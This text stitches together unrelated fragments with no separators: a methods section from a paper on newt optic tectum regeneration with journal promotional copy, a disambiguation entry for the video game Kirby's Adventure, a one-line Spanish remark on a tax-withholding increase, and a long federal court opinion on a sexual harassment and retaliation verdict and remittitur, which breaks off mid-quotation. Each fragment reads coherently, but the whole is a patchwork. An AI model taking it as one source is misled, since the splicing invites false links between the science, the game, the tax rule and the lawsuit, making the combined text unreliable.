occurs via rostral (medial) to caudal progression, whereas the rostral level retains disrupted architecture (Figs 1 and 2). MATERIALS AND METHODS Animals Sexually mature Iberian ribbed newts, P. waltl, were originally obtained from Dr T. Hayashi (Tottori University, Tottori, Japan). The experiments were carried out on adult newts that were about 12 cm long, had been raised from eggs and had metamorphosed after half a year to 1 year in our laboratory. The animals were kept in plastic containers in dechlorinated tap water at 24–26°C under a 12/12 h light/dark cycle, mimicking natural conditions, and were fed more than twice a week. All animal procedures were carried out using protocols approved by the Animal Care and Use Committee of Kyoto University (Kyoto, Japan). Excision of the unilateral optic tectum Newts were anesthetized with 0.2% MS222 (Sigma-Aldrich) and placed on the stage of a stereomicroscope. A 4×4 mm region of the scalp and skull above the mesencephalon was cut on three sides with a disposable surgical knife, making an open ‘window’ with a hinge. After opening this window, the meninges were torn with fine forceps and blood was rinsed off with 1×Steinberg solution supplemented with 100 U/ml penicillin and 100 µg/ml streptomycin (Meiji Seika Pharma, Tokyo, Japan). The right and left optic lobes were detached using a tungsten needle. The left OT (a quarter of the mesencephalon) was excised with ophthalmic scissors and the cut surface was trimmed, and then the top of the scalp and skull were restored to their original position. The post-surgery animals were kept on wet paper towels for 1 week (until the scalp wound was closed), and then transferred to normal breeding water, where they started to feed normally. Immunohistochemistry Anesthetized newts were perfusion-fixed with 4% paraformaldehyde in phosphate-buffered saline (PBS), and then the brains were removed and postfixed in the same fixative at 4°C overnight. To prepare cytosections, the fixed samples were immersed in 20% sucrose in PBS, embedded in OCT compound (Sakura Finetek Japan, Tokyo, Japan), and cut into 12 µm thick coronal or horizontal sections. For free-floating sections in Figs 3 and 6 (except for Fig. 6K) and Figs S5B, S6 and S7, the fixed samples were washed with PBS and then cut into 80 µm thick coronal sections. Histology The anesthetized newts were perfusion-fixed with 4% paraformaldehyde in PBS, and subsequently the head portion was immersion-fixed with 75% methanol/25% acetic acid fixative at 4°C overnight. Heads were decalcified in Osteosoft (Merck, Darmstadt, Germany) and embedded in paraffin. Serial paraffin sections of 10 µm thickness were made from the brains of intact newts and newts at different times after the surgery, and stained with HE. Hematoxylin (Muto Pure Chemicals, Tokyo, Japan) diluted 1:10 and Eosin Y (Merck) were used for the staining. EdU long-term tracing One hundred microliters of EdU (1 mg/ml in PBS) (Tokyo Chemical Industry, Tokyo, Japan) was injected twice into the abdominal cavity (at 1 wpl and 2 wpl), and the anesthetized animals were euthanized at 4 wpl or 6 wpl. After cryosectioning into 12 µm slices, EdU incorporation was detected using a Click-iT EdU Imaging Kit (Invitrogen), and then immunohistochemistry for double staining was performed as described above. Detection of cell proliferation For detecting S-phase cells at various time points, 1 mg/ml EdU (Tokyo Chemical Industry, 100 µl) was injected into the abdominal cavity at 0 or 10 dpl, or 2 or 4 wpl. Newts were euthanized 1 h after EdU injection for ‘short-term labeling’, and perfusion fixed and postfixed with 4% paraformaldehyde in PBS. Cryosections were prepared as described above for immunohistochemistry. To detect M-phase cells, anti-pH3 antibody was used. Assessment of cell fate by electroporation A ‘window’ was opened in the skull of anesthetized newts as described above. Then plasmid DNA solution [a mixture of pT2K-CAGGS-EGFP and pCAGGS-T2TP (Kawakami and Noda, 2004; Urasaki et al., 2006) containing 1 mg/ml of each plasmid in PBS and 0.05% Fast Green] was injected into the third ventricle of the brain, and electroporated in the left-caudal ependymal layer twice with five square-wave pulses of 50 V/cm (10 ms pulse length, 999 ms pulse interval) applied using an electroporator CUY21 (Nepa Gene, Chiba, Japan). Two days after electroporation, the unilateral left OT was excised. Images of electroporated brains were obtained using a fluorescence stereomicroscope (Leica Microsystems, Wetzlar, Germany; M205 FA). Images of immunolabeled sections and HE staining sections were obtained using an FV10i confocal microscope (Olympus, Tokyo, Japan) and an Axiovert 200M microscope (Carl Zeiss, Oberkochen, Germany), respectively. In immunolabeled sections, 12 µm thick sections were photographed as single z-plane images, while 80 µm thick sections were photographed as Z-stack-constructed images using FV10-ASW software (Olympus). Original images were stitched together by using Image Composite Editor (Microsoft) or ImageJ (NIH) and processed by linear adjustments with ImageJ and Photoshop (Adobe). For improving viewability of multi-color images, triple and double immunolabeled sections including Hoechst detection were digitally processed via the following procedures using Photoshop (Adobe): (1) A single fluorescent channel for Hoechst was copied on another layer and converted into gray in RGB channels. (2) To reduce the excessive brightness when merged with other immunofluorescent signals, the fill percentage of the Hoechst layer was changed from 100% to 30%. (3) Another one or two immunofluorescent signals, excluding the Hoechst signal, were processed on the layer for which blending mode was to ‘screen’. (4) A single image was obtained by displaying two layers for Hoechst and other immunofluorescent signals. All experimental animals were randomly obtained from the F1 generation of the same parents, to avoid bias derived from the age of the animals at the time of surgeries. Cells were manually counted using ImageJ. Statistical analysis was performed using an unpaired two-tailed Student's t-test with Welch correction for two groups of observations, and one-way ANOVA followed by Tukey's post-hoc test for multiple comparisons. All immunohistochemistry and histology results were obtained from experiments repeated at least three times using different animals. Acknowledgements We thank Toshinori Hayashi (Tottori University) for providing inbred P. waltl and for newt care. We are grateful to Rio Tsutsumi and Reiko Muto for helpful comments on the manuscript and Elizabeth Nakajima for critical reading and proofreading the manuscript. We also thank Kazutoshi Mori for helpful comments and support. This work was supported by a grant from the Japan Society for the Promotion of Science (JSPS) Research Fellowship for Young Scientists (13J00982) to Y.U., grants from the Innovative Areas from the Ministry of Education, Culture, Sports, Science and Technology of Japan (22124001, 22124002) and Grant-in-Aid for Scientific Research (S), part-funded by JSPS (16H06376) to K.A. This is an Open Access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/3.0), which permits unrestricted use, distribution and reproduction in any medium provided that the original work is properly attributed. Our cover article characterizes the impact of different putative postsynaptic partners of the small ventral lateral neurons on the control of rhythmic locomotor behavior. M. Fernanda Ceriani and team found that some of these novel neuronal clusters are relevant for the control of locomotor activity. Frank Kozielski and colleagues have developed a 96-well crystallization screen for viral RNA-dependent RNA polymerases (RdRps). Read about this platform for streamlining the crystallisation of RdRps and implementing structure-based drug discovery programs. Biology Open has strong credentials and publishing with us is easy and fast. BiO aims to provide rapid publication for scientifically sound observations and valid conclusions in developmental, cell, experimental and translational biology. Submit your paper here; you’ll be in good company. If your submission to one of our other journals, Development, Journal of Cell Science, Journal of Experimental Biology or Disease Models & Mechanisms, is unsuccessful, did you know you can transfer your paper and any reviews directly to Biology Open? The majority of papers transferred with reviews are accepted for publication. Find out how here.
Kirby's Adventure (disambiguation) Kirby's Adventure is a 1993 platforming video game published by Nintendo for the Nintendo Entertainment System. Kirby's Adventure may also refer to: Kirby's Adventure Wii, European title for a 2011 platforming video game published by Nintendo for the Nintendo Wii, known in North America as Kirby's Return to Dreamland
¿Cómo será el aumento? La ley ha dispuesto que el aumento sea gradual, incrementando la retención de impuestos este año de 10% a 10,75% hasta llegar , a 17% en 2028
UNITED STATES DISTRICT COURT FOR THE DISTRICT OF COLUMBIA ) CARMEN JEAN-BAPTISTE ) ) Plaintiff, ) ) v. ) Civil No. 11-1587 (RCL) ) DISTRICT OF COLUMBIA ) ) Defendant. ) ) MEMORANDUM OPINION Following a six-day trial in which the jury returned a verdict on all counts and a $3.5 million compensatory award for plaintiff Carmen Jean-Baptiste, the defendant District of Columbia (“the District”) filed this Motion [188] for a New Trial, a New Trial on Damages or, in the Alternative, for Remittitur. Upon consideration of the motion, Jean-Baptiste’s Opposition [194] thereto, the District’s Reply [199], the entire record herein, and the applicable law, the Court will DENY the District’s motion with respect to its request for a new trial or a new trial on damages and will GRANT the District’s motion with respect to its request for remittitur. Jean- Baptiste will have twenty one days in which to decide whether to accept a reduced award of $350,000, which is the highest amount the jury tolerably could have awarded, or whether to proceed to a new trial on damages. I. BACKGROUND In late April or early May 2006, plaintiff Jean-Baptiste was hired as a lifeguard by the District of Columbia Department of Parks and Recreation (“DPR”). The parties disputed whether she was hired as a seasonal or year-round employee. Jean-Baptiste was assigned to the 1 Takoma Pool and reported to Assistant Pool Manager Rodney Weaver. Jean-Baptiste alleged that Weaver sexually harassed her and that, after she reported the conduct, Weaver and the District retaliated against her and ultimately terminated her employment in mid-October 2006. Jean-Baptiste sued the District alleging a hostile work environment in violation of Title VII, 42 U.S.C. §2000e et seq., and the District of Columbia Human Rights Act (DCHRA), D.C. Code §2-1401.01 et seq. (Counts 1–2); deliberate indifference to her Fifth Amendment constitutional rights in violation of 42 U.S.C. § 1983 (Count 3); and retaliation in violation of Title VII, the DCHRA, § 1983, and the D.C. Whistleblower Act (“WPA”), D.C. Code §§ 1- 615.51 et seq.) (Counts 4–7). Third Am. Compl. 12–17, July 5, 2007, ECF No. 51. This Court granted summary judgment for the District on the § 1983 claims and denied it with respect to the hostile work environment and retaliation claims under Title VII, the DCHRA, and the WPA. Mem. Op., Aug. 16, 2011, ECF No. 161; Order, Aug. 16, 2011, ECF No. 162. Jean-Baptiste’s hostile work environment and retaliation claims proceeded to trial in August 2012. 1 At trial, the jury heard testimony of a “culture of sexual harassment and sexual discrimination at Takoma,” of a “boys-gone-wild culture” in the aquatics department, and, with respect to many of the male supervisors above Jean-Baptiste, “a boys club from the top down.” Test. of Stacy Mills, Trial Tr. 42–48, Aug. 7, 2012. They also heard testimony about inadequate policies and practices of the District in responding to sexual harassment complaints. Jean-Baptiste testified that Weaver started to sexually harass her as soon as she began working at Takoma. Specifically she stated that he told her he was interested in her, asked her to go with him to Atlantic City, and crudely and sexually propositioned her, specifically stating that 1 Jean-Baptiste originally joined suit with three other plaintiffs who had been employed by DPR but who suffered alleged harassment and discrimination at the hands of different supervisors at different times and different locations. After motion by the District, the Court severed the actions. See Mem. Op., Aug. 16, 2011, ECF No. 161; Order, Aug. 16, 2011, ECF No. 162. 2 he “wanted to get some of [her] pussy for [his] birthday.” Trial Tr. 28–30, Aug. 6, 2012. He would also call her out of the pool while she was swimming and then stand before her with an erection, staring at her body and her vaginal area and licking his lips. Id. Finally, she stated that he would touch her hair. Id. Jean-Baptiste testified that she told him his conduct made her uncomfortable and asked him to stop, but that the conduct persisted, though for how long is unclear. Compare Test. of Carmen Jean-Baptiste, Trial Tr. 29–32, Aug. 6, 2012 (stating that the harassment occurred “daily” and “never stopped”) with Test. of Carmen Jean-Baptiste, Trial Tr. 154–58, Aug. 6, 2012 (stating that the “earliest date of harm is May 1st, what I said and when he started, and the latest date of harm is June 2006”) and Def.’s Ex. 88 (stating the same). Jean-Baptiste verbally complained to Weaver’s supervisors, and named six supervisors to whom she had brought her concerns. Id. at 35. Each supervisor said that he or she would look into the matter. Id. at 35–51. Jean-Baptiste testified that one supervisor, Solomon Robinson, required her to present her complaint in a meeting with Rodney Weaver, such that she had to confront her harasser. Test. of Carmen Jean-Baptiste, Trial Tr. 42–45, Aug. 6, 2012. Jean- Baptiste stated that, during this meeting, Weaver did not deny he had harassed her. Test. of Carmen Jean-Baptiste, Trial Tr. 45, Aug. 6, 2012 (“Rodney didn’t say anything, and Solomon in return said, ‘[S]ince you didn’t respond . . . everything she’s telling me now is the truth.’”); Test. of Solomon Robinson, Trial Tr. 129, Aug. 7, 2012 (“Rodney [said] ‘Carmen, you know we play around.’”). However, Mr. Robinson never investigated the complaint further or referred it to higher level supervisors or the EEO office. See id. at 129 (“You don't know DPR very much if you think the policy means [the sexual harassment complaint] goes up [the chain of command]. . . . You give the immediate supervisor an opportunity to address the issues.”); cf. Pl.’s Ex. 70 (“All managers and supervisors are responsible for . . . ensuring that complaints of [sexual 3 harassment and retaliation] are promptly forwarded to the EEO Officer or Chief of Human Resources.”); Test. of Sean Link, Trial Tr. 107, Aug. 8, 2012 (responding affirmatively when asked whether, “[w]hen a supervisor receives a complaint, according to this, they’re supposed to forward the complaint on to higher levels and also EEO, correct?”). Instead, Mr. Robinson “left it in the hands of” Sean Link, Weaver’s direct supervisor. Id. at 125. Sean Link, however, denied having been aware of the matter and does not appear to have investigated either. Test. of Sean Link, Trial Tr. 88, Aug. 8, 2012 (answering in the affirmative when asked whether it was his testimony that “during Ms. Baptiste’s employment [he] never even heard of any complaint of sexual harassment against Rodney Weaver that she had made during her entire summer employment, correct?”). At least two individuals complained to management on Jean-Baptiste’s behalf. Stacy Mills, a volunteer who was regularly at the Takoma pool, testified that she complained about sexual harassment by both Rodney Weaver and Robert Ford, another manager at the pool. She stated that Weaver sexually harassed staff and that she complained to Sylvia Gwathmey, the chief shop steward with the union, to deputy director Roslyn Johnson, to an executive of the mayor’s office, and to a female attorney in the D.C. Attorney General’s office. Trial Tr. 37–45, Aug. 6, 2012. Additionally, after Jean-Baptiste complained to Margarita Cruz, an assistant manager at the pool, the two had a meeting with Rodney Weaver. Cruz testified that during the meeting, Weaver stroked Jean-Baptiste’s hair and told Jean-Baptiste she was beautiful. Trial Tr. 40, Aug. 8, 2012. Later, during a meeting between Cruz, Weaver, Sean Link, and Robert Ford, Cruz reported that Jean-Baptiste had made a sexual harassment complaint to her against Weaver. Cruz testified that Robert Ford said he would not do anything about the complaint. After the 4 men asked Cruz to leave the meeting, she overheard Robert Ford and Rodney Weaver joking about which one of them would “fuck” Jean-Baptiste first. Trial Tr., Aug. 8, 2012 at 43–46. 2 Jean-Baptiste’s was not the only complaint of sexual harassment at the Takoma pool during this period. Weaver had been accused of sexual harassment just one year before Jean- Baptiste was hired, and Jean-Baptiste presented evidence that the District conducted only a superficial “investigation” into the complaint. See Test. of Terrence Reddick, Trial Tr. 58–73, Aug. 7, 2012. In describing that investigation, former EEO Officer Terrence Reddick testified that he never asked anyone at the pool whether they had witnessed sexual harassment, he simply collected written statements from employees and concluded that there was no evidence of sexual harassment. Id. at 71–72 (in responding to questions about whether he had asked employees if they witnessed sexual harassment, Mr. Reddick responded, “it’s not my role . . . to investigate to that level”). In fact, according to Margarita Cruz, Weaver and Robert Ford “coerced” her into writing a statement for that investigation in which she exaggerated complaints about the victim’s work performance. Test. of Margarita Cruz, Trial Tr. 31–35, 53, Aug. 8, 2012. To make matters worse, Margarita Cruz testified that she had been sexually harassed by Robert Ford. Test. of Margarita Cruz, Trial Tr. 27–31. Thus, one of the supervisors to whom Jean-Baptiste complained about sexual harassment had allegedly sexually harassed another supervisor to whom she also complained. After Jean-Baptiste notified supervisors that Weaver was harassing her, she said that Weaver began to criticize her job performance, and to force her to sit in the lifeguard’s chair for two and a half hours at a time, instead of the fifteen minutes recommended by the Red Cross. Id. 2 Although parts of the foregoing may have been hearsay, depending on whether they fall under the opposing party statement exception to the hearsay rule, see Fed. R. Evid. 801(d)(2), the District did not object and thus cannot complain of the admission of this evidence, see Fed. R. Evid. 103. 5 at 42–49. She also stated that Weaver and Robert Ford threatened to have her transferred or fired if she didn’t “listen to what [they] said.” Id. at 52. Weaver denied touching Jean-Baptiste’s hair, standing before her with an erection, using the word “pussy,” or making any other sexual or romantic advances toward Jean-Baptiste. Test. of Rodney Weaver, Trial Tr. 147–80, Aug. 8, 2012. Instead, Weaver complained that Jean- Baptiste would eat and wear sunglasses while in the lifeguard chair and that she would disappear from work. Id. at 147–56. He stated that he made note of Jean-Baptiste’s conduct in a DPR log book; however, neither Weaver nor the District was able to produce this book. Test. of Rodney Weaver, Trial Tr. 20–21, Aug. 9, 2012. Finally, although Weaver acknowledged that he may have threatened to write up Jean-Baptiste, he denied threatening to send her home and said he made no formal recommendations to management about whether her employment should continue. He did, however, acknowledge recommending that she be transferred to another pool. Id. at 21–28; Test. of Rodney Weaver, Trial Tr. 167, Aug. 8, 2012. In late September, Jean-Baptiste discovered that her name was not on a list of year-round DPR employees, despite her understanding that she had been hired for year-round employment. She approached several supervisors about the discrepancy. Test. of Carmen Jean-Baptiste, Trial Tr. 59, Aug. 6, 2012. At this time, she informed supervisor Roslyn Johnson about the sexual harassment and Johnson told her that she needed to put the complaint in writing and that she would be moved to another pool for the next two weeks. Id. at 60–61. Jean-Baptiste testified that she understood that DPR would examine its budget during this two week period, but that they would continue to employ her as a full-time employee afterwards. Id. at 68–69; but see Pl.’s Ex. 33, Email from Harold Houston to Carmen Jean-Baptiste (Sept. 29, 2006) (“At this point, we cannot promise anything in addition to the two week extension as the department is 6 attempting to determine our ability to hire staff for our 2007 fiscal year.”). On October 14, 2006, Jean-Baptiste emailed three DPR supervisors informing them of the sexual harassment by Weaver and stating that she would be taking legal action. Pl.’s Ex. 5. On October 17, Jean-Baptiste reported to work and was told, with no reason given, that she no longer worked there. Test. of Carmen Jean-Baptiste, Trial Tr. 90–91, Aug. 6, 2012. The next day, Jean-Baptiste reapplied for a lifeguard position at the Takoma pool and took another lifeguard assessment. Jean-Baptiste failed two parts of the assessment but later expressed concerns about the way the assessment had been conducted. Id at 90–91, 101–02.; Pl.’s Ex. 39. She was not rehired as a lifeguard. No formal investigation of her sexual harassment charges seems to have been conducted prior to her departure. Jean-Baptiste filed an EEOC Charge of discrimination on November 1, 2006. Pl.’s Ex. 11. Jean-Baptiste testified regarding the “trauma” and “uncertainty” of not having a permanent job after she was let go. She had two sons and went on food stamps, which she said was “not a good feeling” and that it made her feel like “less of a mother.” Trial Tr. 125, Aug. 6, 2012. In response to how the sexual harassment and retaliation affected her, she said it “really . . . affected [her] deeply, in the sense [that she] had to go to . . . bed night after night and wake up day after day knowing that [she didn’t] have an income or have a job to provide for [her] kids.” Id. at 125. She said that it caused “stress and anxiety,” that she couldn’t sleep, felt sick to her stomach, gained about twenty five pounds, and had some hair loss. Id. at 125–26. “It had really tormented me,” she said “that I went for help and I follow all the chain of command . . . and I didn’t receive any help at all and no one came to my assistance . . . .” She testified that she felt withdrawn, “less of a woman,” distant, and depressed, and said she spent less time with her 7 children and didn’t go out as much. Id. at 127. She reported taking up acupuncture at her temple. Id. at 127. After a six-day trial, the jury returned a $3.5 million verdict for Jean-Baptiste on her hostile work environment and retaliation claims under Title VII and the DCHRA, and on her WPA claim. This verdict was limited to compensatory damages. The jury asked that a recommendation be included in the record and recommended that the District, among other things, “begin an EEO training program for all DPR managers,” “rewrite DPR personnel policies to remove ambiguities about the EEO complaint and investigation processes,” and “initiate a review of the actions, or lack of action, taken by all DPR employees and managers at the Takoma Pool and Aquatic Program” over the period during and immediately following Jean- Baptiste’s employment. Verdict Form at 4, ECF No. 185. In response, the District filed the instant motion for a new trial, a new trial on damages, or for remittitur. Ms. Baptiste filed a Motion, ECF No. 186, seeking $485,324.90 in attorneys’ fees and litigation costs, plus interest. She also filed a Motion for Equitable Relief, ECF No. 187, seeking backpay from the date her discharge to the date of final judgment in this case, reinstatement into the position she would occupy absent retaliation, and other relief. 3 These motions have been stayed pending the Court’s ruling on the motion for new trial. See Order, Nov. 8, 2012, ECF No. 196. 3 Title VII expressly allows courts to order “such affirmative action as may be appropriate, which may include, but is not limited to, reinstatement or hiring of employees with or without back pay . . . .” 42 U.S.C. § 2000e-5(g)(1). The D.C. Whistleblower Protection Act also allows for injunctive relief, reinstatement, back pay, and interest on back pay. D.C. Code § 1-615.54(a)(1)(A)–(G). Likewise the D.C. Human Rights Act allows for remedies including reinstatement, with or without back pay. D.C. Code § 2-1403.16(b). 8 II. DISCUSSION A. New Trial Not Warranted 1. Exclusion of Testimony of Arnita Bonner-Evans or Richelle Marshall Does Not Warrant New Trial The district argues that a new trial is warranted because the Court made “substantial evidentiary errors” that “unduly prejudiced the District’s defense.” Def.’s Mot. 12. However, even if the Court’s exclusion of testimony was error, it did not cause undue prejudice and thus the Court will deny the motion for a new trial. The District states that plaintiff’s status as a temporary or seasonal employee was a “key issue at trial” and that the Court erroneously precluded Ms. Bonner-Evans or Ms. Marshall from testifying about an “employment verification form,” Def.’s Ex. 105, which allegedly would have shown that Jean-Baptiste was a seasonal employee. The District does not argue that either witness would present particular testimony other than apparently authenticating Exhibit 105. There are several problems with the District’s argument. First, although the question of whether Jean-Baptiste was a seasonal or permanent employee was an important issue, the District faced potential liability regardless of how the jury answered this question. The Court emphasized in its earlier Memorandum Opinion that the fact that Jean-Baptiste may have been a seasonal employee would not be “an adequate response to plaintiffs’ allegations . . . that DPR did not continue or renew [her] employment because [she] made accusations of sexual harassment. . . . Failure to hire, renew, or promote can serve as an actionable basis for a Title VII retaliation claim.” Mem. Op. 44, Aug. 16, 2011, ECF No. 161 (emphasis added) (citing Carter v. George Wash. Univ., 387 F.3d 872, 878 (D.C. Cir. 2004); Mitchell v. Baldridge, 759 F.2d 80, 86 n.5 (D.C. Cir. 1985)). The employee has the ultimate burden of showing that employment action, including a failure to renew a seasonal employee’s 9 position, is retaliatory and not for some legitimate, non-discriminatory reason. Id. at 45. The defendant need only “articulate specific reasons for its actions that ‘if believed by the trier of fact, could support a finding that unlawful discrimination was not the cause of the employment action.’” Id. (quoting St. Mary’s Honor Ctr. v. Hicks, 509 U.S. 502, 507 (1993) (citing Burdine, 450 U.S. at 254–55, n.8)). The District spent considerable time during trial, and put forth evidence, attempting to show that Jean-Baptiste’s employment ended because she was a seasonal employee and because “she was not as qualified as other candidates, as evidenced by her poor performance in the life saving assessment.” Def.’s Mot. 4; see also Test. of Sean Link, Trial Tr. 83–84, Aug. 8, 2008 (“[W]hen I was first detailed to Takoma I was not certain of her status. My assumption was that she was a summer employee . . . and that was later confirmed . . . . My supervisor, Harold Houston, . . . told me she was a summer hire.”); Test. of Harold Houston, Trial Tr. 208, Aug. 7, 2012 (stating that he did not question the accuracy of a document listing Jean-Baptiste as a summer employee); Def.’s Ex. 154 (offer letter to Jean-Baptiste stating that she had only been offered a nine-week, “temporary summer placement” but including incorrect information regarding her title and pay). Jean-Baptiste also put forth evidence of her status as a year-round employee. In addition to her own testimony, she submitted a hiring request form indicating that she was to be hired as a “full-time” rather than a “temporary” employee. Pl.’s Ex. 2. Moreover, Jean-Baptiste showed that she worked at DPR for about twenty four weeks, significantly longer than the nine to sixteen weeks usually worked by summer employees. See Def.’s Ex. 154; Test. of Sean Link, Trial Tr. 101, Aug. 8, 2012. The District did not provide a credible explanation for this discrepancy. See Trial Tr. 27–28, Aug. 7, 2012. Finally, several witnesses testified that they had believed Jean- 10 Baptiste to be a year-round employee. See, e.g., Test. of Stacy Mills, Trial Tr. 53, Aug 7, 2012; Test. of Solomon Robinson, Trial Tr. 114–115, Aug. 7, 2012 (reading testimony from his deposition in which he stated that Jean-Baptiste was listed as a year-round staffer); Test. of Sylvia Gwathmey, Trial Tr. 8 (stating that she had talked with Benny McCottry, the former manager of aquatics who hired Jean-Baptiste, and that he stated he had intended for Jean- Baptiste to be hired as a year-round employee). It is not clear whose version the jury credited. They could have found for Jean-Baptiste regardless of whether she was a year-round or seasonal employee. In fact, the jury verdict form accounted for the dispute regarding her employment status by asking jurors whether plaintiff had “proven . . . that [her] complaint(s) was/were a substantial or motivating factor in the District of Columbia’s deciding not to offer plaintiff permanent employment or deciding to terminate her.” Verdict Form 2, ECF No. 185 (emphasis added). Thus, the jury’s ultimate conclusion regarding whether Jean-Baptiste was a seasonal employee was not outcome determinative and any error the Court might have made in excluding the document was not prejudicial. Even if the Court were to assume that it was vital to the District’s case that Jean-Baptiste be found to be a seasonal employee, the document they sought to introduce was not particularly probative. The “employment verification form” was prepared on June 7, 2007, eight months after Jean-Baptiste’s termination and her filing of an EEOC charge. The form states that the reason she left DPR was “summer employment.” This type of post hoc explanation of Jean Baptiste’s employment status is hardly convincing, particularly given that the District was anticipating legal action by Jean-Baptiste on her sexual harassment and retaliation claims. The document’s probative value is thus slim and the jury could have easily disregarded it, particularly given the evidence Jean-Baptiste offered to support her status as a year-round employee. 11 2. The District Has Waived Any Challenge to the Adverse Inference Instruction The District argues that the Court erroneously instructed the jury that “[i]f the defendant destroys personnel records” relevant to a Title VII charge or action, the jury “should presume that any such documents would have been beneficial to Jean-Baptiste and adverse to the defendant.” Jury Instructions at 5, ECF No. 180. At trial, the District had not been able to produce an employment contract for Jean-Baptiste or log books in which Jean-Baptiste’s supervisor had allegedly written up Jean-Baptiste for infractions at work. Trial Tr. 54–59, Aug. 9, 2012. The District also belatedly produced a missing page from the lifeguard assessment that Jean-Baptiste had failed after her employment ended. Id. at 59. However, the District has waived this argument because it did not properly object to the instruction at trial. Federal Rule of Civil Procedure 51 provides that a “party who objects to an instruction. . . must do so on the record, stating distinctly the matter objected to and the grounds for the objection.” Fed. R. Civ. P. 51(c)(1). Such an objection is timely if made before the instructions and arguments are delivered and out of the jury’s hearing. Fed. R. Civ. P. 51(c)(2)(A), 51(b)(2). Failing to object and provide grounds for objection before the jury begins deliberation will result in a waiver of the right to challenge the instruction. The D.C. Circuit has stated that “Rule 51 requires a specific objection to preserve an issue for appeal. . . .” Graham v. Davis, 880 F.2d 1414, 1419–20 (D.C. Cir. 1989). In Parker v. District of Columbia, the circuit held that the District of Columbia had “neglected to state distinctly its specific objections to [the court’s] charge before the jury retired to deliberate” and that “[a]bsent such specified objection, it would be overreaching for this court to reject the instructions and to upset the jury’s verdict.” 850 F.2d 708, 715 (D.C. Cir. 1988). “Requiring counsel to state specifically his objections to the court’s instructions immediately before the jury 12 retires to deliberate enables the district court to cure any errors it may have made in the instructions.” Graham, 880 F.2d at 1420; see also City of Oklahoma City v. Tuttle, 471 U.S. 808, 815 n.3 (1985) (stating that “[Rule] 51 requires counsel objecting to a jury instruction to ‘stat[e] distinctly the matter to which he objects and the grounds of his objection’” and implying that an objection made at trial was insufficient where the petitioner had stated only that it objected to “‘the Oklahoma City language . . . which is single occurrence language’”). 4 Although the District objected to the inclusion of the adverse instruction during trial, it never stated the basis for this objection. Trial Tr. 59–60, Aug. 9, 2012. The District only stated “Just so that the record is clear, now that the alleged missing documents have been identified, the District objects to the adverse inference instruction.” The District’s Reply brief provides no convincing arguments to the contrary. The District suggests that, at trial, it stated that it “object[ed] to the adverse inference instruction,” and that this “language was clear and specific in its articulation of the object of the objection . . . .” The District argues that this was not a “general objection” which would be insufficient to preserve the argument for its motion. However, while the District may have “clear[ly] and specific[ally]” articulated the object of its objection, it never provided the grounds of its objection. This omission is fatal to preservation of the objection. The cases the District cites do not suggest otherwise. For example, the District argues that its objection to the adverse inference instruction is “similar in language and specificity” to 4 Most cases addressing Rule 51’s requirement that a party object to a jury instruction in a timely and specific way deal with the preservation of that objection on appeal. However, Rule 51’s requirement applies equally to preservation of the argument in the context of a motion for new trial. See City of Newport v. Fact Concerts, Inc., 453 U.S. 247, 255 (1981) (noting that questions regarding an unchallenged punitive damage instruction “perhaps could have been avoided simply by a reliance, under Rule 51, upon petitioner’s procedural default [of failing to object]”); see also 9C Charles Alan Wright & Arthur R. Miller, Fed. Prac. & Proc. Civ. § 2553 (3d ed.) (“As many courts have held, objections under Rule 51(c) to the instructions made after the jury retires and has begun deliberating are not timely and will not be considered on appeal or on a motion for a new trial.”). 13 the “specific objection” held sufficient in Kostelec v. State Farm Fire & Cas. Co., 64 F.3d 1220, 1224–25 (8th Cir. 1995). Reply at 4–5 (citing Kostelec). However, the Kostelec court did not provide the substance of the objection at issue there, stating only that State Farm had “specifically objected” to the instruction. 64 F.3d at 1225. The District also seeks to distinguish this case from cases in which parties either did not object at all, see Reply at 5–6 (citing Hobson v. Wilson, 737 F.2d 1, 31 (D.C. Cir. 1984) and SEB S.A. v. Montgomery Ward & Co., 594 F.3d 1360, 1375 (Fed. Cir. 2010)), or in which the plaintiff actually acquiesced to the disputed jury instruction, id. at 6 (citing Westcott v. Crinklaw, 133 F.3d 658, 662 (8th Cir. 1998)). These cases do not inform the situation at hand, where the District objected to the instruction but failed to provide the Court with grounds for its objection, as required by Rule 51. The District failed to preserve its objection to the adverse inference instruction and cannot now argue for a new trial on the basis of any alleged error in the giving of the instruction. B. Remittitur is Appropriate The District moves for a new trial on damages or, in the alternative, for remittitur. Specifically, the District argues that the jury award of $3.5 million was the product of an unfair trial, beyond all reason, and so great as to shock the conscience and warrant a remittitur. In arguing the trial was unfair, the District rehashes some arguments the Court has already dispensed with above. Thus, the Court now addresses only the arguments for remittitur. 1. Legal Standard for Remittitur Federal trial courts may review jury awards of damages for excessiveness and may order remittitur or a new trial where damages are found excessive. See Gasperini v. Ctr. for Humanities, Inc., 518 U.S. 415, 433 (1996) (“This discretion includes overturning verdicts for excessiveness and ordering a new trial without qualification, or conditioned on the verdict 14 winner’s refusal to agree to a reduction (remittitur).”). District courts “[have] broad discretion to order a remittitur in lieu of a new trial.” Hooks v. Wash. Sheraton Corp., 578 F.2d 313, 316 (D.C. Cir. 1977). However, reduction of a compensatory damage award may not be made without offering plaintiff the option of a new trial. Hetzel v. Prince William Cnty., 523 U.S. 208, 211 (1998) (noting that the circuit court’s order requiring the district court to enter judgment “for a lesser amount than that determined by the jury without allowing petitioner the option of a new trial, cannot be squared with the Seventh Amendment”). 5 In this Circuit, remittitur is appropriate only when either “(1) the verdict is beyond all reason, so as to shock the conscience, or (2) the verdict is so inordinately large as to obviously exceed the maximum limit of a reasonable range within which the jury may properly operate.” Peyton v. DiMario, 287 F.3d 1121, 1126–27 (D.C. Cir. 2002) (internal citations omitted). Courts may not set aside a verdict merely because the judge would have awarded a different amount, 11 Charles Alan Wright & Arthur R. Miller, Fed. Prac. & Proc. Civ. § 2807 (3d ed.), and courts “must be especially hesitant to disturb a jury’s determination of damages in cases involving intangible and non-economic injuries.” Langevine v. Dist. of Columbia, 106 F.3d 1018, 1024 (D.C. Cir. 1997) (citation omitted). Once a court determines that remittitur is appropriate, reduction is only allowable if it “‘permit [s] recovery of the highest amount the jury tolerably could have awarded.’” Langevine, 5 The Seventh Amendment requires that “the right of trial by jury shall be preserved, and no fact tried by a jury, shall be otherwise re-examined in any Court of the United States, than according to the rules of the common law.” U.S. Const., amend. VII. [T]he Reexamination Clause does not inhibit the authority of trial judges to grant new trials ‘for any of the reasons for which new trials have heretofore been granted in actions at law in the courts of the United States.’ That authority is large. ‘The trial judge in the federal system . . . has . . . discretion to grant a new trial if the verdict appears to [the judge] to be against the weight of the evidence.’ This discretion includes overturning verdicts for excessiveness and ordering a new trial without qualification, or conditioned on the verdict winner’s refusal to agree to a reduction 